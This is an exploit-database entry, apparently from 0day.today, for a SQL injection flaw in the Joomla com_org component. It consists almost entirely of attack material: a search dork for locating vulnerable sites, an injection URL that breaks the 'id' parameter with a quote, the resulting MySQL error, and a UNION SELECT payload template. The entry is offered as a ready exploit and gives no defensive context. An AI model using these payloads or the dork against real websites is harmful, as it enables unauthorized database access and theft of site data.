Joomla Component com_org SQL Injection Vulnerability

2010-03-14T00:00:00
ID 1337DAY-ID-11287
Type zdt
Reporter N2n-Hacker
Modified 2010-03-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================
Joomla Component com_org SQL Injection Vulnerability
====================================================

###############################################################################
##                                                                           ##
##          Joomla com_org SQL Injection Vulnerability                      ##
##                                                                           ##
###############################################################################

 
*******************************************************************************
=> Dork = inurl:"option=com_org"
 
-------------------------------------------------------------------------------
# EXp : http://www.website.com/path/index.php?option=com_org&task=info&id=22' <=[SQLI] --&lang=en
 
Error = "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version"
 
# http://www.website.com/path/index.php?option=com_org&task=info&id=-22 UNION SELECT 1,2 ..... --&lang=en
 
 
********************************************************************************



#  0day.today [2018-03-06]  #